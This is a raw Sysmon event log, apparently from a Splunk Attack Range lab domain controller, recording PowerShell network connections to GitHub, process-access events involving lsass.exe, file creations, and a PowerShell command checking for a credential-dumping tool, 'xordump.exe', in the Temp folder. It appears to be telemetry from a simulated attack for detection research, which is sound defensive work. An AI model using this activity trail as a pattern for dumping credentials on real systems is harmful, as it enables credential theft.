Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=09EE932C1A174CE75F88B4B71CC0878A,SHA256=A3E4BE4747851B33526BEE7CB7C6B7D39F75DC5B1CD76A9EF7142289F8DC1FD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.862{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61535-false185.199.109.154cdn-185-199-109-154.github.com443https 354300x800000000000000025387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.676{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61534-false192.30.255.112lb-192-30-255-112-sea.github.com443https 22542200x800000000000000025386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.861{4DB9351A-A32F-60D3-4C06-00000000CF01}2508github-releases.githubusercontent.com0::ffff:185.199.109.154;::ffff:185.199.110.154;::ffff:185.199.111.154;::ffff:185.199.108.154;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000025385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.674{4DB9351A-A32F-60D3-4C06-00000000CF01}2508github.com0::ffff:192.30.255.112;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:09.420{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AA06DD77B40BB0CB074BFC75F11916,SHA256=B7A88162393ABE5CE96ADABEB3984B7937A667A2271CAEECDA4AFFB760F3AA4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:10.421{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F42C9DBB2DD09CCA9D9E357B47918B,SHA256=33A71481AA9CCBFFA27B2A830881B2FF56A46F7FA7F418854C0952D3AA288493,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:11.952{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045996C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000025391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:10.305{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61536-false10.0.1.12-8000- 23542300x800000000000000025390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:11.437{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5DCC87EE6D10CCA6244D5F8E3C0617B,SHA256=C04185792EC869BB370739201CE0E694D439BB34760E648567A258CEAB325409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:12.452{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8053F813D5895FE78836D5CD5AC0F9,SHA256=A80FBF686D1E1B506B61667D9D6FF3FABFCC80F0069AF082D9E5A7648BA3D2C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.484{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4CD0963FCB178BEDDF43D6AC8014FC,SHA256=2D2839D6251FFEFF863D5D92675F6B3351A0F0A3A97DF330BACEEFA1225D7349,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.468{4DB9351A-A335-60D3-4D06-00000000CF01}4840ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.374{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.374{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.312{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.312{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:13.296{4DB9351A-A335-60D3-4D06-00000000CF01}4840\PSHost.132689562132207342.4840.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.281{4DB9351A-A335-60D3-4D06-00000000CF01}4840ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zhjarash.22o.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.281{4DB9351A-A335-60D3-4D06-00000000CF01}4840ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gz4aj50h.bbc.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.265{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gz4aj50h.bbc.ps12021-06-23 21:10:13.265 10341000x800000000000000025404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.249{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.218{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.220{4DB9351A-A335-60D3-4D06-00000000CF01}4840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path 'C:\Windows\Temp\xordump.exe') {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:13.187{4DB9351A-A32F-60D3-4C06-00000000CF01}2508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:14.515{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A7E0967CF6C6F8B57EEA46D676938E,SHA256=0665E2A6AE13519B556FCF6AC5EDCC67AD29DCA05DA41EB9CCE2CAC0185B208B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:14.327{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6C4DC8FCBE965AE1E3DFED893E18418,SHA256=91EFE1A129A0062E555F8A8E697655279948FE5BC69CDF0E8E78266E2866FDE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:14.234{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BCA8F05DA38905A35C4DE3381B53602,SHA256=88AFBE1163492296A28B44A037CB32385B7FE844954EC6F4AD47A526AF6BBF30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:14.234{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7B26337549EEF526B77F1F9141F909D,SHA256=D9C3E10F3CAFEB57D435307CD5422F122D410F196D2102390DF2D9B3959854E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:15.531{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA824705884500CF075442107C6AF5A3,SHA256=F03A270D83D3D5ECCD4D4608DC62BA9B54750B8EC2B657C88B55D6FD4153B87C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:16.562{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 